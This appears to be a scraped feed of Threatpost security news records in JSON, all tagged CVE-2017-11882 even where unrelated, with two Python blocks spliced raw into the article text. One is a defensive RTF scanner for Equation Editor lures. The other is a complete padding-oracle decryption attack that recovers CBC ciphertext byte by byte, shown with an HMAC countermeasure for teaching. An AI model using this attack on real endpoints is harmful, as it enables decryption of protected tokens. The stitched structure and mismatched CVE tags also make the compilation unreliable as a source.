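The lure described in this article and in the Osiris piece above (an RTF carrying an embedded OLE object of the Equation Editor class, often with the document's auto-update flag set so the object is loaded without a click) can be triaged with a short scanner. The following is an added example, not code from Microsoft, Tripwire or Threatpost: the `\objclass`, `\objdata` and `\objupdate` control words are from the RTF specification, the OLE1 object header layout is the documented one, `Equation.3` is the ProgID of Equation Editor 3.0 (the host of eqnedt32.exe), and `scan_rtf`, `build_sample_rtf` and the sample document are constructed here.

```python
import re

# RTF destinations and control word from the RTF specification (constructed regexes, not a
# full RTF parser: obfuscated documents that split or encode these tokens will slip past).
OBJCLASS_RE = re.compile(rb"\\objclass\s*([A-Za-z0-9_.]+)")
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")
OBJUPDATE_RE = re.compile(rb"\\objupdate\b")

# ProgIDs under which Equation Editor (eqnedt32.exe) is embedded in Office documents.
EQUATION_PROGIDS = (b"Equation.3", b"Equation.2")


def decode_objdata(hexblob: bytes) -> bytes:
    # \objdata carries the OLE1 object as hex text that may be broken across lines.
    cleaned = re.sub(rb"\s+", b"", hexblob)
    if len(cleaned) % 2:
        cleaned = cleaned[:-1]  # tolerate a dangling nibble from a truncated document
    return bytes.fromhex(cleaned.decode("ascii"))


def ole1_class_name(blob: bytes) -> bytes:
    # OLE1 ObjectHeader: OLEVersion(4) FormatID(4) ClassNameLength(4) ClassName(NUL-terminated).
    if len(blob) < 12:
        return b""
    name_len = int.from_bytes(blob[8:12], "little")
    if not 0 < name_len <= 256 or 12 + name_len > len(blob):
        return b""
    return blob[12:12 + name_len].rstrip(b"\x00")


def scan_rtf(rtf: bytes) -> dict:
    # Report the object classes an RTF embeds and whether it asks Word to update them on load.
    declared = [m.group(1) for m in OBJCLASS_RE.finditer(rtf)]
    embedded = []
    for m in OBJDATA_RE.finditer(rtf):
        try:
            name = ole1_class_name(decode_objdata(m.group(1)))
        except ValueError:
            continue  # not valid hex; leave it to a deeper parser
        if name:
            embedded.append(name)
    names = declared + embedded
    hits_equation = any(n.startswith(p) for n in names for p in EQUATION_PROGIDS)
    return {
        "objclass": declared,
        "embedded_class": embedded,
        "targets_equation_editor": hits_equation,
        "auto_update": bool(OBJUPDATE_RE.search(rtf)),
    }


def build_sample_rtf(progid: bytes, auto_update: bool) -> bytes:
    # Constructed test document: one embedded OLE1 object of class `progid` with placeholder
    # native data (not a real Equation Native stream), optionally marked for auto-update.
    name = progid + b"\x00"
    native = b"\x00" * 16
    ole1 = (b"\x01\x05\x00\x00" + (2).to_bytes(4, "little")
            + len(name).to_bytes(4, "little") + name
            + (0).to_bytes(4, "little") + (0).to_bytes(4, "little")
            + len(native).to_bytes(4, "little") + native)
    update = b"\\objupdate" if auto_update else b""
    return (b"{\\rtf1\\ansi{\\object\\objemb" + update
            + b"{\\*\\objclass " + progid + b"}"
            + b"{\\*\\objdata " + ole1.hex().encode() + b"}}}")
```

The scanner reads both the declared class and the class recorded inside the OLE1 header, so a document that lies in one place is caught by the other, but in-the-wild RTFs for this bug are heavily obfuscated (control words broken up with junk, hex split across destinations), so treat a hit as grounds for quarantine and a miss as no information. The next step in a real triage is to carve the Equation Native stream out of the native data and inspect its MTEF records, since the overflow is in the handling of an over-long font name.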
Once editing was enabled, the injection process began and the HawkEye keylogger was downloaded. It then harvested sensitive information: system details, passwords from common web browsers, clipboard contents, desktop screenshots, webcam pictures and account credentials.\n\nCybercriminals continuing to use older bugs is a clear indicator that better patching habits are in order: \u201cThe fact that digital attacks continue to leverage exploit code for old vulnerabilities like CVE-2017-11882 highlights [the need for organizations to keep their software up-to-date](<https://threatpost.com/threatlist-financial-services-firms-lag-in-patching-habits/134750/>) by investing in their vulnerability management capabilities,\u201d noted Tripwire.\n", "cvss3": {}, "published": "2019-06-10T16:10:04", "type": "threatpost", "title": "Microsoft Warns of Email Attacks Executing Code Using an Old Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2019-06-10T16:10:04", "id": "THREATPOST:EE5FF4DE95B4AED68C90DCB6444B6560", "href": "https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:04:57", "description": "Dennis Fisher talks with Katie Moussouris of Microsoft about the company\u2019s new [Blue Hat Prize](<https://threatpost.com/microsoft-pay-200000-innovative-defense-technology-blue-hat-prize-program-080311/>) for innovative defensive security 
technology, why Microsoft didn\u2019t start a bug bounty program and whether this will become an annual contest.\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n\nSubscribe to the Digital Underground podcast on [iTunes](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n", "cvss3": {}, "published": "2011-08-24T11:45:50", "type": "threatpost", "title": "Katie Moussouris on the Microsoft Blue Hat Prize", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-18T20:01:36", "id": "THREATPOST:A9EF092F5BA25CAD6C775AAE60BC318E", "href": "https://threatpost.com/katie-moussouris-microsoft-blue-hat-prize-082411/75575/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:30", "description": "Microsoft on Thursday confirmed that the blue screen of death issues that affected a slew of users after the latest batch of Patch Tuesday updates are the result of an existing infection by the Alureon rootkit. \n\nThere was widespread speculation after the patch release that simply installing the MS10-015 update was causing the BSOD condition on some Windows 32-bit machines. However, Microsoft said at the time this was not the case and started an investigation into the problem. In an advisory released Thursday, the company said that it now was confident that the restart problem is being caused by the Alureon rootkit.\n\n\u201cAfter extensive testing, Microsoft has confirmed that the restart issue is a result of Alureon rootkit infections,\u201d Microsoft\u2019s Jerry Bryant, senior security communications manager lead, said in a statement. 
\n\nAlureon is a sophisticated malware package that comprises a number of components, including a rootkit, search hijacking functionality and the ability to modify DNS settings. One of the changes it makes when it\u2019s installed is a modification to a specific driver. \n\n\u201cFor the most common system configuration (for machines using ATA hard disk drives), the ATA miniport driver \u2018atapi.sys\u2019 is the file which is targeted.\n\nWhile the concept of modifying Windows system files as part of an installation method is not new, it is not a common approach. The file modification performed by Alureon overwrites the data in the target driver\u2019s resource section with its own code. The entry point of the driver is modified to point to this code. By doing so, the malicious code is executed when the driver is loaded by the operating system,\u201d Microsoft\u2019s Scott Molenkamp wrote in a [blog post on the MS10-015 issues](<http://blogs.technet.com/mmpc/>). \u201cAs part of the February security updates, an update (MS10-015) resolving a vulnerability in Windows Kernel was released. This update included a new operating system kernel. Inspecting the updated kernel at the same VA, we observe that this address no longer corresponds to the start of the \u201cExAllocatePool\u201d API. In the updated kernel, the VA of \u201cExAllocatePool\u201d has changed. Therefore, after applying MS10-015, Alureon will now be attempting to make an invalid call.\u201d\n\nThat results in the BSOD or a system hang. Users affected by this problem can fix it by replacing the infected driver with a clean copy via the system console. 
\n", "cvss3": {}, "published": "2010-02-18T18:08:58", "type": "threatpost", "title": "MS10-015 Restart Issues Are the Result of Rootkit Infection", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:26:11", "id": "THREATPOST:27F2EB604A7262CA0448D6463BA3B2A4", "href": "https://threatpost.com/ms10-015-restart-issues-are-result-rootkit-infection-021810/73561/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:30", "description": "Microsoft confirmed this week that one of its recent acquisitions, the gaming firm Mojang, has not been hacked.\n\nNearly 2,000 credentials belonging to users of the [Mojang game](<https://mojang.com/games/>) Minecraft \u2013 email addresses and passwords in plain-text \u2013 surfaced on Pastebin earlier this week and speculation began to run rampant.\n\nGiven the Swedish video gaming service \u2013 which Microsoft purchased in September \u2013 boasts in excess of 50 million members, many feared the company had been hacked.\n\n[Heise Security](<http://www.heise.de/newsticker/meldung/1800-Minecraft-Accounts-kompromittiert-2520192.html>) reported the breach on Monday, and searched through the list and discovered users from Germany were on it and that the information was current. 
If a user hasn\u2019t set a security question, attackers could potentially log into that user\u2019s account.\n\nMicrosoft\u2019s response, however, suggests it\u2019s just business as usual for Mojang, which, like other gaming firms, gets hit from time to time and is forced to reset a small group of users\u2019 passwords.\n\n\u201cWe can confirm that no Mojang.net service was compromised and that normal industry procedures for dealing with situations like this were put in place to reset passwords for the small number of affected accounts,\u201d a Microsoft spokesperson told Stuart Dredge with _The Guardian_ on Wednesday.\n\nWhile Microsoft didn\u2019t explain exactly how the service\u2019s users were compromised, Owen Hill, the company\u2019s Chief Word Officer, suggested that a fraction of Mojang\u2019s users may have been phished.\n\n\u201cNo! We haven\u2019t been hacked. A bunch of bad people have tricked some of our users into disclosing their account information,\u201d Hill wrote in a blog entry titled [Let\u2019s Talk About Password Security](<https://mojang.com/2015/01/lets-talk-about-password-security/>) yesterday.\n\nHill claims the company has already emailed the affected users and reset their passwords. 
To help reinforce security going forward, Hill is encouraging users to reset their passwords, not to use the same password on multiple websites and to avoid giving away account details on sites that aren\u2019t its own.\n\nGamers are routinely targeted by hackers and phishers alike.\n\nEmail addresses, hashed passwords and other information were spilled from the video game developer [Blizzard Entertainment when it was hacked in 2012](<http://threatpost.com/blizzard-sued-over-data-breach-authenticator-sales-111212/77207>) while in 2013 another video game company, [Ubisoft](<http://threatpost.com/ubisoft-urges-password-changes-following-hack/101165>), urged users to create new passwords after hackers were able to exploit a vulnerability to get to one of the company\u2019s databases. Usernames, email addresses and encrypted passwords were leaked in that hack.\n\nLast year, a cache of usernames, email addresses and salted password hashes belonging to players of the popular game [League of Legends](<http://na.leagueoflegends.com/en/news/riot-games/announcements/important-security-update-and-password-reset>) was compromised. 
The service forced users to change their passwords and had to put two new features, email verification and two-factor authentication, into development to bolster security.\n", "cvss3": {}, "published": "2015-01-22T14:35:45", "type": "threatpost", "title": "Mojang Resets Users' Passwords, Microsoft Insists Not a Hack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-01-27T15:10:50", "id": "THREATPOST:4DF584EB3FA47CA6245D964EA2A1A2FB", "href": "https://threatpost.com/following-credential-leak-microsoft-confirms-mojang-not-hacked/110596/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:26", "description": "Microsoft on Friday said that a weakness in Internet Explorer 8 identified recently by security researcher Ruben Santamarta is not an exploitable vulnerability, but rather a \u201ctechnique for bypassing ASLR.\u201d\n\nASLR (Address Space Layout Randomization) is a memory protection that, along with DEP (Data Execution Prevention), Microsoft has added to recent versions of Windows and Internet Explorer in order to prevent some specific memory-based attacks. Security researchers and software security experts have praised the two technologies as very effective anti-exploit mitigations and have said ASLR and DEP together make it much more difficult to take advantage of memory vulnerabilities on Windows machines.\n\nHowever, the two technologies certainly are not a foolproof defense against attacks. 
Several researchers have demonstrated various techniques for bypassing ASLR and DEP under certain circumstances, although Microsoft has addressed some of those attacks in recent releases of Internet Explorer.\n\nSantamarta, a researcher at Wintercore, a Spanish security company, recently published information on a [flaw he found in mshtml.dll](<https://threatpost.com/flaw-core-ie-8-component-could-enable-remote-attacks-070610/>), the HTML viewer in IE 8. He said in [his advisory](<http://reversemode.com/index.php?option=com_content&task=view&id=68&Itemid=1>) that the problem could be exploited to leak a memory pointer in IE 8, which, when combined with some other data, could allow an attacker to run code on a remote machine.\n\nHowever, Jerry Bryant of Microsoft\u2019s Security Response Center said that the problem is not an exploitable vulnerability.\n\n\u201cThe Internet Explorer reverse mode issue targeting mshtml.dll is not an exploitable vulnerability. It is a technique to bypass ASLR (Address Space Layout Randomization) under certain conditions. ASLR is an important countermeasure introduced to help protect customers from memory-targeting attacks that are commonly seen in the wild. The mitigation is most effectively deployed in tandem with DEP (Data Execution Prevention),\u201d he said. 
\u201cThese two mitigations, though not capable of blocking all attacks, are highly effective when used in combination with one another.\u201d \n", "cvss3": {}, "published": "2010-07-09T18:34:43", "type": "threatpost", "title": "Microsoft Says IE8 Weakness Not an Exploitable Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:26:00", "id": "THREATPOST:9AA382E93ED0C2124DD69CF4DDC84EB7", "href": "https://threatpost.com/microsoft-says-ie8-weakness-not-exploitable-flaw-070910/74195/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:26", "description": "When one Pennsylvanian man couldn\u2019t foot his bills, he opted to steal the identity of someone who could \u2013 one of the world\u2019s richest men, Microsoft co-founder and billionaire Paul Allen.\n\nAn AWOL soldier from Pittsburgh swiped Allen\u2019s Citibank credit card account information earlier this year to make a $658.81 payment on a loan from the Armed Forces Bank, according to an [Associated Press report](<http://www.washingtonpost.com/business/fbi-awol-pa-soldier-obtained-microsoft-co-founder-debit-card-by-changing-account-address/2012/03/27/gIQAUqoodS_story.html>).\n\nA criminal complaint unsealed Monday claims that after acquiring Allen\u2019s account information, the soldier, Brandon Lee Price, 28, changed the address of the card to his own and reported it missing in an attempt to have a new card sent to his Pittsburgh address. The card was delivered and soon after, the fraudulent charges began to pile up.\n\nOn top of the loan payment, it was also used at a Pittsburgh GameStop ($278.18), a Family Dollar ($1) and at a Western Union, where Price tried to process a $15,000 transaction.\n\nThe bank noticed the illicit charges and promptly notified the FBI, which had an agent follow Price around the neighborhood. 
After agents saw him wearing the same clothes he wore in surveillance footage taken at the GameStop and Family Dollar stores, Price was arrested on March 2.\n\nAccording to authorities, Price had been absent from the Army since June 2010 and was wanted as a deserter.\n\nAllen, who helped found Microsoft with Bill Gates in 1975, also owns the NBA\u2019s Portland Trailblazers and the NFL\u2019s Seattle Seahawks and has a net worth of about $14.2 billion, [according to Forbes](<http://www.forbes.com/profile/paul-allen/>) \u2013 enough to rank at number 48 on the [publication\u2019s list](<http://www.forbes.com/billionaires/#p_1_s_a0_All%20industries_All%20countries_All%20states_>) of the richest people on the planet.\n\nFor more on this, check out the AP report via the [Washington Post](<http://www.washingtonpost.com/business/fbi-awol-pa-soldier-obtained-microsoft-co-founder-debit-card-by-changing-account-address/2012/03/27/gIQAUqoodS_story.html>).\n", "cvss3": {}, "published": "2012-03-29T15:56:05", "type": "threatpost", "title": "Fortune Favors the Bold? Man Steals Microsoft Founder's Identity, Credit Card", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:32", "id": "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "href": "https://threatpost.com/fortune-favors-bold-man-steals-microsoft-founder-s-identity-credit-card-032912/76380/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:54", "description": "Microsoft has released the emergency out-of-band patch for the [ASP.NET padding oracle attack](<https://threatpost.com/microsoft-pushes-emergency-patch-aspnet-flaw-092810/>), less than two weeks after a pair of researchers discussed the flaw and a reliable attack against it at a security conference in Argentina. 
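The padding oracle attack this article is about, as an added worked example (not Rizzo and Duong's tool and not ASP.NET code): a token is an IV followed by CBC ciphertext, the server's only observable behaviour is whether a submitted token unpads cleanly, and that single bit is enough to decrypt the token one byte at a time. Everything here is constructed: the block cipher is a four-round Feistel permutation built on HMAC-SHA256 so the block runs on the standard library alone (the attack depends only on CBC and PKCS#7, so AES behaves identically), `VulnerableServer` stands in for the affected endpoint, and `AuthenticatedServer` shows the standard fix, authenticating the ciphertext before any decryption so forgeries are rejected uniformly.

```python
import hashlib
import hmac
import os

BLOCK = 16


def _f(key, rnd, half):
    # Feistel round function: keyed HMAC-SHA256 truncated to half a block.
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:BLOCK // 2]


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt_block(key, block):
    # Four-round Feistel permutation on a 16-byte block: a constructed stand-in for AES.
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, xor(l, _f(key, rnd, r))
    return l + r


def decrypt_block(key, block):
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = xor(r, _f(key, rnd, l)), l
    return l + r


def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # this exception is the oracle
    return data[:-n]


def cbc_encrypt(key, iv, padded):
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = encrypt_block(key, xor(padded[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += xor(decrypt_block(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return pkcs7_unpad(out)


class VulnerableServer:
    # Constructed stand-in for the ASP.NET endpoint: a token is IV || CBC ciphertext, and the
    # only thing an attacker learns from submitting one is whether its padding was valid.
    def __init__(self):
        self.key = os.urandom(32)

    def issue_token(self, plaintext):
        iv = os.urandom(BLOCK)
        return iv + cbc_encrypt(self.key, iv, pkcs7_pad(plaintext))

    def padding_is_valid(self, token):
        try:
            cbc_decrypt(self.key, token[:BLOCK], token[BLOCK:])
            return True
        except ValueError:
            return False


class AuthenticatedServer(VulnerableServer):
    # Same cipher, but the token carries an HMAC checked before decryption, so forgeries are
    # rejected uniformly and the padding check is never reached.
    def issue_token(self, plaintext):
        body = super().issue_token(plaintext)
        return body + hmac.new(self.key, body, hashlib.sha256).digest()

    def padding_is_valid(self, token):
        body, tag = token[:-32], token[-32:]
        if not hmac.compare_digest(tag, hmac.new(self.key, body, hashlib.sha256).digest()):
            return False
        return super().padding_is_valid(body)


def padding_oracle_decrypt(oracle, token):
    # Recover the plaintext of IV || ciphertext from the oracle's True/False answers alone.
    blocks = [token[i:i + BLOCK] for i in range(0, len(token), BLOCK)]
    plaintext = b""
    for prev, cur in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)  # decrypt_block(key, cur), learned one byte at a time
        for pos in range(BLOCK - 1, -1, -1):
            want = BLOCK - pos  # padding value forced into positions pos..15
            forged = bytearray(BLOCK)
            for j in range(pos + 1, BLOCK):
                forged[j] = inter[j] ^ want
            for guess in range(256):
                forged[pos] = guess
                if not oracle(bytes(forged) + cur):
                    continue
                if pos == BLOCK - 1:
                    # A last-byte hit may be 0x02 0x02 rather than 0x01: disturb byte 14 and
                    # require the padding to stay valid before accepting the guess.
                    forged[pos - 1] ^= 0xFF
                    still_ok = oracle(bytes(forged) + cur)
                    forged[pos - 1] ^= 0xFF
                    if not still_ok:
                        continue
                inter[pos] = guess ^ want
                break
            else:
                raise RuntimeError("no padding hit; the oracle is probably closed")
        plaintext += xor(inter, prev)
    return pkcs7_unpad(plaintext)
```

Against the authenticated server every forged query is refused before the padding check, so `padding_oracle_decrypt` gets no hits and raises. That is also why error-message workarounds of the kind the article goes on to mention are not a fix: any behavioural difference between a padding failure and another failure, a timing difference included, re-opens the oracle, whereas a MAC check removes the attacker's ability to submit modified ciphertext at all.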
\n\nThe patch for the ASP.NET bug is only available through [Microsoft\u2019s Download Center](<https://www.microsoft.com/downloads/en/default.aspx?pf=true>) right now, but the company plans to push it out over Windows Update and Windows Server Update Services within a few days, as well. \n\n\u201cFor customers who use Automatic Updates, the update will be automatically applied once it is released broadly. Once the Security Update is applied, customers are protected against known attacks related to Security Advisory 2416728,\u201d said Dave Forstrom, director of Trustworthy Computing at Microsoft. \n\nThe company will hold a [live webcast](<https://msevents.microsoft.com/CUI/WebCastEventDetails.aspx?EventID=1032464130&EventCategory=4&culture=en-US&CountryCode=US>) at 4 p.m. EDT Tuesday to discuss the vulnerability and the patch release. \n\nThe ASP.NET vulnerability first came to light on Sept. 13 when the researchers who discovered the vulnerability, Juliano Rizzo and Thai Duong, [discussed the bug and their technique for exploiting it](<https://threatpost.com/microsoft-pushes-emergency-patch-aspnet-flaw-092810/>). The attack itself is an implementation of the padding oracle technique, a method first described several years earlier for exploiting weaknesses in CBC padding checks in crypto implementations.\n\n\u201cWe knew ASP.NET was vulnerable to our attack several months ago, but we didn\u2019t know how serious it is until a couple of weeks ago. It turns out that the vulnerability in ASP.NET is the most critical amongst other frameworks. In short, it totally destroys ASP.NET security,\u201d said Duong, when discussing the attack. \u201cIt\u2019s worth noting that the attack is 100% reliable, i.e. one can be sure that once they run the attack, they can exploit the target. It\u2019s just a matter of time. If the attacker is lucky, then he can own any ASP.NET website in seconds. The average time for the attack to complete is 30 minutes. 
The longest time it ever takes is less than 50 minutes.\u201d\n\nLast week Microsoft released some guidance for customers, explaining a couple of workarounds for the vulnerability that could help mitigate attacks. However, Rizzo and Duong said that the workarounds, which rely on changing the way that error messages are generated by target Web applications, don\u2019t protect against the attack, only against one version of it.\n\nMicrosoft didn\u2019t release any information on the vulnerability until Sept. 17, the day that Rizzo and Duong gave their presentation at Ekoparty. This is the second time in less than two months that Microsoft has released an emergency patch. On Aug. 2, the company issued an [out-of-band patch](<https://threatpost.com/attacks-escalate-microsoft-ships-emergency-windows-patch-080210/>) for the original bug that was identified as part of the Stuxnet malware attack. \n", "cvss3": {}, "published": "2010-09-28T18:12:43", "type": "threatpost", "title": "Microsoft Pushes Emergency Patch For ASP.NET Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:24:17", "id": "THREATPOST:8EC1069E3114E28911EA3438DA21B952", "href": "https://threatpost.com/microsoft-pushes-emergency-patch-aspnet-flaw-092810/74525/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:42", "description": "Microsoft will use its monthly patch to fix a critical security hole in versions of its Microsoft Office suite that could allow attackers to run malicious code on vulnerable systems. \n\nThe company [announced details of its upcoming monthly patch for November on Thursday](<http://www.microsoft.com/technet/security/bulletin/ms10-nov.mspx>). 
This month\u2019s advance notification also included bulletins regarding upcoming fixes for two other security vulnerabilities: another in the Microsoft Office suite that was rated \u201cimportant,\u201d and a third in the Forefront Unified Access Gateway that was also rated \u201cimportant.\u201d \n\nThe relatively meager group of three bulletins is a welcome change for IT administrators still trying to dig out from [October\u2019s monthly patch](<https://threatpost.com/microsoft-plans-record-breaking-patch-tuesday-100710/>), which comprised 16 bulletins and fixes for 49 separate vulnerabilities. \n\nThe most serious vulnerability is rated \u201ccritical\u201d for Microsoft Office 2007 Service Pack 2 and for the 32- and 64-bit editions of Office 2010. It is rated \u201cimportant\u201d for Office 2003 Service Pack 3, Office XP Service Pack 3 and Office for Mac 2011. \n\nAccording to Microsoft\u2019s Bulletin [Severity Rating System](<http://www.microsoft.com/technet/security/bulletin/rating.mspx>), \u201ccritical\u201d vulnerabilities are described as those whose exploitation could allow the propagation of an Internet worm without user interaction, while \u201cimportant\u201d holes are those in which exploitation could result in the compromise of the confidentiality, integrity or availability of users\u2019 data or processing resources. \n\nA second Office vulnerability is rated \u201cimportant\u201d and affects PowerPoint 2002 Service Pack 3 and PowerPoint 2003 Service Pack 3. \n\nThe third bulletin affects Microsoft\u2019s Forefront Unified Access Gateway 2010 Updates 1 and 2 and is rated important. \n\nMicrosoft will release its monthly patch update on Tuesday November 9, 2010. 
\n", "cvss3": {}, "published": "2010-11-04T21:58:02", "type": "threatpost", "title": "Microsoft To Patch Critical Office Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:44", "id": "THREATPOST:7ACEE8004906A83F73EF46D8EE9A83F3", "href": "https://threatpost.com/microsoft-patch-critical-office-flaw-110410/74642/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:05:59", "description": "In this video, Tim Armstrong, a malware researcher at Kaspersky Lab talks with Ryan Naraine about the strengths and weaknesses of the Android operating system. Armstrong looks at strengths and weaknesses of the open-source platform and warns about the risks associated with jailbreaking/rooting Android devices.\n", "cvss3": {}, "published": "2011-03-15T12:34:48", "type": "threatpost", "title": "The Security of the Android Operating System", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:34:57", "id": "THREATPOST:BB432D74FB2DC755C74CBEE5CF71B1E9", "href": "https://threatpost.com/security-android-operating-system-031511/75027/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:17", "description": "Rogue antivirus was once the scourge of the Internet, and [while this sort of malware is not entirely extinct](<http://threatpost.com/pro-syrian-malware-increasing-in-number-complexity/107814>), it\u2019s fallen out of favor among criminals as users have become more aware and security products have gotten better at blocking the threat.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015231/Rogue-AV-decline.png>)\n\n_Image via TechNet_\n\nHowever, Daniel Chipiristeanu, an antivirus researcher at the Microsoft Malware Protection Center (MMPC), claims that a simpler, and primarily browser-based, version of 
the fake antivirus scheme has proven more effective in recent months.\n\nThe MMPC says that once a user machine is compromised by one such piece of malware, Rogue:Win32/Defru, it blocks users from browsing to a long list of popular websites on the Internet and instead presents an image familiar to anyone who\u2019s dealt with rogue antivirus in the past.\n\n\u201cWhen the user is browsing the Internet, the rogue will use the hosts file to redirect links to a rather infamous specific fake website (pcdefender.<removed> IP 82.146.<removed>.21) that is often used in social engineering by fake antivirus malware,\u201d Chipiristeanu explained on Microsoft\u2019s TechNet blog.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015227/win32delfru.png>)\n\n_Image via TechNet_\n\nWhile the user will see the above image in their browser window, the URL in the address bar will be that of the website the user intended to visit in the first place. In other words, the malware quietly redirects the user to a new website, but the address bar does not reflect that movement. If the user tries to access another website, the threat follows. The message reads:\n\n\u201c_Detected on your computer malicious software that blocks access to certain Internet resources, in order to protect your authentication data from intruders the defender system Windows Security was forced to intervene.\u201d_\n\nThe fake scanner shows users a long list of non-existent malware it claims to have found on the computer in question. Then it offers to clean the system for a fee. 
If the user clicks the \u201cPay Now\u201d button, he will be redirected to a payment portal called \u201cpayeer.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015224/defru-payment.png>)\n\n_Image via TechNet_\n\nChipiristeanu claims that paying the fee will not fix the problem.\n\nAt the moment, most of Defru\u2019s victim-machines \u2013 as is indicated by language \u2013 appear to be located in Russia. The United States is a distant second to Russia with Kazakhstan following closely behind in third. The remaining infections are mostly in eastern European and Middle Eastern states with some infections in western Europe as well.\n\nYou can find the list of redirected sites with the [detailed Defru malware information](<http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Rogue:Win32/Defru#tab=2>).\n\n\u201cThe rogue is written in PHP, uses a PHP EXE compiler (Bambalam) and will copy itself to %appdata%\\w1ndows_<4chars>.exe (e.g. \u2018w1ndows_33a0.exe\u2019),\u201d Chipiristeanu explains. 
\u201cIt persists at system reboot by adding itself to the registry key HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run with the value \u2018w1ndows_<4chars>\u2019.\u201d\n\n\u201cThe user can clean their system by removing the entry value from the \u201crun\u201d registry key, delete the file from disk and delete the added entries from the hosts file.\u201d\n", "cvss3": {}, "published": "2014-08-20T13:59:20", "type": "threatpost", "title": "Fake AV Defru Puts New Spin on Rogue AV", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-08-25T18:42:59", "id": "THREATPOST:4FA617D4BE1CFDFB912E254229B94E61", "href": "https://threatpost.com/a-new-spin-on-rogue-antivirus/107846/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:42", "description": "Researchers at HP\u2019s Zero Day Initiative have disclosed full details and proof-of-concept exploit code for a series of bugs they discovered that allow attackers to bypass a key exploit mitigation in Internet Explorer.\n\nThe disclosure is a rarity for ZDI. The company typically does not publish complete details and exploit code for the bugs it reports to vendors until after the vulnerabilities are fixed. But in this case, Microsoft has told the researchers that the company doesn\u2019t plan to fix the vulnerabilities, even though the bugs were serious enough to win ZDI\u2019s team a $125,000 [Blue Hat Bonus](<https://threatpost.com/microsoft-launches-100000-bug-bounty-program/101015>) from Microsoft. The reason: Microsoft doesn\u2019t think the vulnerabilities affect enough users.\n\nThe vulnerabilities that the ZDI researchers submitted to Microsoft enable an attacker to fully bypass ASLR (address space layout randomization), one of the many mitigations in IE that help prevent successful exploitation of certain classes of bugs. 
